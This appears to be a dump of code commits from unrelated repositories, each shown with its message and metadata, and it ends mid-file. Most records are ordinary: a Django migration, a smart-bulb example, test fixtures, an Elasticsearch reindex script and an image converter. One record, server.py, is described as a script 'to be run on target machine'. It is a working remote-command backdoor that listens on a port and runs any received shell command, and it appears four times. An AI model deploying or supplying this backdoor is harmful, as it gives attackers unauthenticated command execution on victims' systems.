field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add attributes to Anime migration<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
|
1b3bc233591c0165df234f5f822a60017b2c8e69
|
server.py
|
server.py
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket, closed):
while True:
request = client_socket.recv(1024)
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
client_handler = threading.Thread(target = handle_client, args = (client, closed))
client_handler.start()
|
Add the script to be run on target machine
|
Add the script to be run on target machine
|
Python
|
mit
|
Laserbear/PypeBomb
|
Add the script to be run on target machine
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket, closed):
while True:
request = client_socket.recv(1024)
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
client_handler = threading.Thread(target = handle_client, args = (client, closed))
client_handler.start()
|
<commit_before><commit_msg>Add the script to be run on target machine<commit_after>
|
import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket, closed):
while True:
request = client_socket.recv(1024)
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
client_handler = threading.Thread(target = handle_client, args = (client, closed))
client_handler.start()
|
Add the script to be run on target machineimport sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket, closed):
while True:
request = client_socket.recv(1024)
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
client_handler = threading.Thread(target = handle_client, args = (client, closed))
client_handler.start()
|
<commit_before><commit_msg>Add the script to be run on target machine<commit_after>import sys
import socket
import threading
import subprocess
bind_ip = "0.0.0.0"
bind_port = 9999
if(len(sys.argv) > 1):
try:
bind_ip = sys.argv[1]
bind_port = int(sys.argv[2])
except Exception:
pass #lazy
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
#print "[*] Listening on %s:%d" %(bind_ip, bind_port)
def handle_client(client_socket, closed):
while True:
request = client_socket.recv(1024)
print "[*] Received Request: " + str(request)
if(request.rstrip("\n") == "exit"):
break
else:
# run the command
process = subprocess.Popen(request, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# get the results
results = process.stdout.read() + process.stderr.read()
client_socket.send(results)
client_socket.close()
while True:
client, addr = server.accept()
# print '[*] Accepted connection from ' + str(addr[0]) + ":" + str(addr[1])
client_handler = threading.Thread(target = handle_client, args = (client, closed))
client_handler.start()
|
|
275305e39c072bdc105c10799d5e3ea5345b2d1c
|
examples/example-bulb-hsv.py
|
examples/example-bulb-hsv.py
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
Add a simple HSV example
|
Add a simple HSV example
|
Python
|
mit
|
fabaff/python-mystrom
|
Add a simple HSV example
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
<commit_before><commit_msg>Add a simple HSV example<commit_after>
|
"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
Add a simple HSV example"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
<commit_before><commit_msg>Add a simple HSV example<commit_after>"""
Copyright (c) 2017-2018 Fabian Affolter <fabian@affolter-engineering.ch>
Licensed under MIT. All rights reserved.
"""
import time
from pymystrom import bulb
bulb = bulb.MyStromBulb('192.168.0.51', '5CCF7FA0AFB0')
bulb.set_color_hex('000000FF')
# Get the details of the bulb
print("Current color details:", bulb.get_color())
# Set color as HSV (Hue, Saturation, Value)
bulb.set_color_hsv(50, 100, 100)
time.sleep(3)
# Shutdown the bulb
bulb.set_off()
|
|
2bf5d88f368b7d3de67b419d1ef12ddaa573e79d
|
tests/conftest.py
|
tests/conftest.py
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
Add pytest fixture for copying files to tmpdir
|
Add pytest fixture for copying files to tmpdir
|
Python
|
mit
|
ZedThree/fort_depend.py,ZedThree/fort_depend.py
|
Add pytest fixture for copying files to tmpdir
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
<commit_before><commit_msg>Add pytest fixture for copying files to tmpdir<commit_after>
|
from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
Add pytest fixture for copying files to tmpdirfrom distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
<commit_before><commit_msg>Add pytest fixture for copying files to tmpdir<commit_after>from distutils import dir_util
from pytest import fixture
import os
# Adapted from http://stackoverflow.com/a/29631801/2043465
@fixture(scope="function")
def datadir(tmpdir, request):
'''
Fixture responsible for searching a folder with the same name of test
module and, if available, moving all contents to a temporary directory so
tests can use them freely.
'''
filename = request.module.__file__
test_dir, _ = os.path.splitext(filename)
if os.path.isdir(test_dir):
dir_util.copy_tree(test_dir, str(tmpdir))
return tmpdir
|
|
db3e824660330dd504a221f033ba8af510836091
|
acme/jax/imitation_learning_types.py
|
acme/jax/imitation_learning_types.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
Define common TypeVars for IL/AL algorithms.
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053
|
Python
|
apache-2.0
|
deepmind/acme,deepmind/acme
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
<commit_before><commit_msg>Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053<commit_after>
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
<commit_before><commit_msg>Define common TypeVars for IL/AL algorithms.
PiperOrigin-RevId: 387357896
Change-Id: I09f467e2ef1b38831c429fe6f5fa79e38609d053<commit_after># python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""JAX type definitions for imitation and apprenticeship learning algorithms."""
from typing import TypeVar
# Common TypeVars that correspond to various aspects of the direct RL algorithm.
DirectPolicyNetwork = TypeVar('DirectPolicyNetwork')
DirectRLNetworks = TypeVar('DirectRLNetworks')
DirectRLTrainingState = TypeVar('DirectRLTrainingState')
|
|
b97cf9b38a51d26e60257785db0b443177f35ed6
|
general/python/es_reindex.py
|
general/python/es_reindex.py
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
Add script to reindex indices
|
Add script to reindex indices
|
Python
|
apache-2.0
|
DHTC-Tools/logstash-confs,DHTC-Tools/logstash-confs,DHTC-Tools/logstash-confs
|
Add script to reindex indices
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
<commit_before><commit_msg>Add script to reindex indices<commit_after>
|
#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
Add script to reindex indices#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
<commit_before><commit_msg>Add script to reindex indices<commit_after>#!/usr/bin/env python
# Copyright 2015 University of Chicago
# Available under Apache 2.0 License
import argparse
import sys
import logging
import elasticsearch
import elasticsearch.helpers
ES_NODES = 'uct2-es-door.mwt2.org'
VERSION = '0.1'
def get_es_client(nodes):
""" Instantiate DB client and pass connection back """
return elasticsearch.Elasticsearch(hosts=nodes,
retry_on_timeout=True,
max_retries=10,
timeout=300)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Reindex events from ' +
'between ES indices ')
parser.add_argument('--source', dest='source', default=None,
help='name of source index')
parser.add_argument('--target', dest='target', default=None,
help='name of target index')
parser.add_argument('--server', dest='server', default=ES_NODES,
help='hostname for ES server')
args = parser.parse_args(sys.argv[1:])
if not args.source or not args.target:
sys.stderr.write("Need to provide a source and target index\n")
sys.exit(1)
client = get_es_client(args.server)
results = elasticsearch.helpers.reindex(client,
args.source,
args.target,
scroll='30m')
sys.stdout.write(str(results))
|
|
e4824f3357c6329e84e0d3f1ad206300c43d62c5
|
src/h5_to_tif_dir.py
|
src/h5_to_tif_dir.py
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
Include Python script to convert 3D stack into dir of tif images
|
Include Python script to convert 3D stack into dir of tif images
|
Python
|
mit
|
seung-lab/Julimaps,seung-lab/Julimaps
|
Include Python script to convert 3D stack into dir of tif images
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Include Python script to convert 3D stack into dir of tif images<commit_after>
|
#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
Include Python script to convert 3D stack into dir of tif images#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Include Python script to convert 3D stack into dir of tif images<commit_after>#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
dir = os.getcwd()
file = sys.argv[1]
files = os.listdir(dir)
if file.endswith(".h5") or file.endswith(".hdf5"):
fn = os.path.join(dir, file)
arr = h5_to_array(fn)
write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
|
3daedd2bc822465d17f1d7ea47f313dfb7486841
|
tests/integration/test_demo_build.py
|
tests/integration/test_demo_build.py
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
